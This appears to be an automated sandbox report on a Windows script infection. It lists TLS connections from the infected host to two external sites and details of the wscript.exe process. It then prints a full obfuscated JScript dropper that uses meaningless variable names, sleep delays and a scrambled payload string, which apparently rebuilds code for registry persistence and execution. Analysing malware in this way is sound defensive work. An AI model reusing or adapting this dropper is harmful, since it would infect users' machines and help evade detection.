Mar 19, 2021 11:06:58.115339994 CET | 193.42.159.175 | 443 | 192.168.2.3 | 49752 | CN=hagdahls.com CN=R3, O=Let's Encrypt, C=US | CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Feb 17 14:46:43 CET 2021 Wed Oct 07 21:21:40 CEST 2020 | Tue May 18 15:46:43 CEST 2021 Wed Sep 29 21:21:40 CEST 2021 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0 | ce5f3254611a8c095a3d821d44539877 |
CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021 | |||||||
Mar 19, 2021 11:07:20.864928007 CET | 188.40.120.141 | 443 | 192.168.2.3 | 49753 | CN=www.giuseppedeluigi.com CN=R3, O=Let's Encrypt, C=US | CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co. | Sun Feb 07 00:08:56 CET 2021 Wed Oct 07 21:21:40 CEST 2020 | Sat May 08 01:08:56 CEST 2021 Wed Sep 29 21:21:40 CEST 2021 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0 | ce5f3254611a8c095a3d821d44539877 |
CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021 |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
System Behavior |
---|
General |
---|
Start time: | 11:01:48 |
Start date: | 19/03/2021 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b2e90000 |
File size: | 163840 bytes |
MD5 hash: | 9A68ADD12EB50DDE7586782C3EB9FF9C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|
Call Graph |
---|
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function position(women, famous, table, motion, unit, past, fact) { |
|
1 | return women.substr ( famous, table ); |
|
2 | } | |
3 | function black(you, body, fly, direct, win) { |
|
4 | reply = ""; | |
5 | end = land; | |
6 | while (end < 2972 ) | |
7 | { | |
8 | carry = size ( you, end ); |
|
9 | reply = band ( reply, carry, end ); |
|
10 | end ++; | |
11 | } | |
12 | return reply; | |
13 | } | |
14 | function quite() { |
|
15 | why = [ 853 ]; | |
16 | control ( why ); |
|
17 | } | |
18 | function control(less, paragraph, guess) { | |
19 | WScript.Sleep ( 50040 ); |
|
20 | my = 6781; | |
21 | while (big = big ) | |
22 | { | |
23 | try | |
24 | { | |
25 | why[my] ( my ); |
|
26 | } | |
27 | catch ( part ) | |
28 | { | |
29 | why[1877757] = big; | |
30 | } | |
31 | my ++; | |
32 | } | |
33 | } | |
34 | function determine(ever, has, wide, apple) { | |
35 | why[6133410] = huge; | |
36 | opposite[street] = big[opposite[land]]; | |
37 | } | |
38 | function size(cook, art) { |
|
39 | return position ( cook, art, care ); |
|
40 | } | |
41 | function level(moon, teeth, but, repeat, joy) { |
|
42 | return moon % ( guide + guide ); | |
43 | } | |
44 | function score(cover, pay, cut, she, gave) { |
|
45 | front = favor ( pay ); |
|
46 | language = land; | |
47 | measure = []; | |
48 | for ( there = land ; there <= ( favor ( cover ) - front ) ; there ++ ) |
|
49 | { | |
50 | if ( position ( cover, there, front ) == pay ) |
|
51 | { | |
52 | measure[favor ( measure ) ] = position ( cover, language, ( there - language ) ); |
|
53 | language = there + front; | |
54 | } | |
55 | } | |
56 | measure[favor ( measure ) ] = position ( cover, language ); |
|
57 | return measure; | |
58 | } | |
59 | function three() { | |
60 | captain = "QKKXl"; | |
61 | why[6003286] = determine; | |
62 | opposite = score ( black ( wind ), captain ); |
|
63 | } | |
64 | function plant(chick, room) { | |
65 | care = 1; | |
66 | guide = care; | |
67 | WScript.Sleep ( 6277 ); |
|
68 | street = guide + care * guide + care; | |
69 | why[5536027] = three; | |
70 | } | |
71 | function big(picture, low, oxygen, heavy) { | |
72 | why[4874286] = plant; | |
73 | WScript.Sleep ( 6319 ); |
|
74 | wind = 'ntrdiSie.tnxnngO(esf(m(( n\"\\\\\"fo%@irU\\ \"Si;+EvtvRnx+DEe\\N\"TdS@enD\\s\"Oan,Mpo Axp0IEs)N.e)%)r=\"\\\\\".=)lt- l 1!e=)=h Sn{\".\\ t%WrpUSaiScvrEr cRi{SDp WNt)\\S\"0.D(0sOt2lMc eAe=eIj=pNb=(%O 2\"e\\2st)2ua 2te{2arv)tC=;s.v .t+}tp\" \\i(e2r l7cfs8Sie1W 4(}{6 \"f\\n;i; e }=s; l)tna0r.f3yr +{en0 pr7tlu,.at2oce(per]e( \\n\"{\\(\")r\'@\\te\\G\"(sE+hbTvcu\'+\\st\\,\"a\\ \"c@\'[\\\\}\"h) ,t(;\\t\")gp\\(\"snd):in;/re /tsv\'S\\a.o+rtth .[I;)M )(]=em+ so\'n\\dl./narsafeer pa.,lrhvact+cha\"e\\M.(= p/j=h(t p\\f\\\'v\\dx +{c;\"2\\)m}?\\l\'y)fPh/pThgrTb,\'H( kLcfaMlubX(n]rPc[eettviisroopepnoS{ .y(r2tA}L;)7M5 =Xt{cSe fMfre\\;\'1e1(-t4t1u=cPr;e)n\"j\" +b\"SZOSt\"e+r\"t_iGaEn\"e+g\"rR.\"C f,.\"r\"t o,pdmrioChrch(c]a\"S\"r+W\"Ce \"o+=\"dt ie\"t+(\" rpW{ga\" +r\")es\"3+e\" RI\"<[nr etwMo(p( A{ ,)ee1(lh0cit)ahc+ w}3 ;0);d)r0o;h c (=]}\" \")+M\";d a \";+o\"]ep\"\\+\"\"pRmgo\"o+s\"cei\".+t\"iRe\"g[[rie3wuo]pl ({e Iydr)te;(\"p\\)\\po;heK HsnW\\u\\S\"i+c\"gRr\".+i\"wEp\"w+t\"wS.U\\\"\"+Q\",_uT\\N\"EiRm\"t+o\"(Rc\")+.\";UsC \"l+}\"h_ \"a+}\"dY EgKeHa\"l h=s .derwo hwc{ w; )\\\"\"lW\",+S\"\\l\"\"c+m\"reohiSc\"p+.\"t.a\".+v\"stoplinrecaSe\"z+p\"aW(\"k(2]e\"2\"d+2\"nt2\"a+2\"hc)e.\";+w\" jw\"}+w\" b\\\"\"+M\"[O+\" ++\"=e;\" +}\"ht \"\'+)\")a(e)\";+}\"cra\"t+c\"hC(\"e[)){tWpSicrrciSpWt(. s=l ereepw(o8p9;592863134=7a6i)k;v}rudtljXzKvKrQjr=ootpcpuorstistneo;c '; | |
75 | land = 0; | |
76 | } | |
77 | quite ( 6885 ); |
|
78 | function band(make, crease, press, mouth, plane, pose, map) { |
|
79 | if ( level ( press ) ) |
|
80 | return make + crease; | |
81 | else | |
82 | return crease + make; | |
83 | } | |
84 | function huge(mountain, who) { |
|
85 | opposite[street] ( opposite[guide] ) ( why ); |
|
86 | } | |
87 | function favor(nor, root, cause) { |
|
88 | return nor.length; | |
89 | } |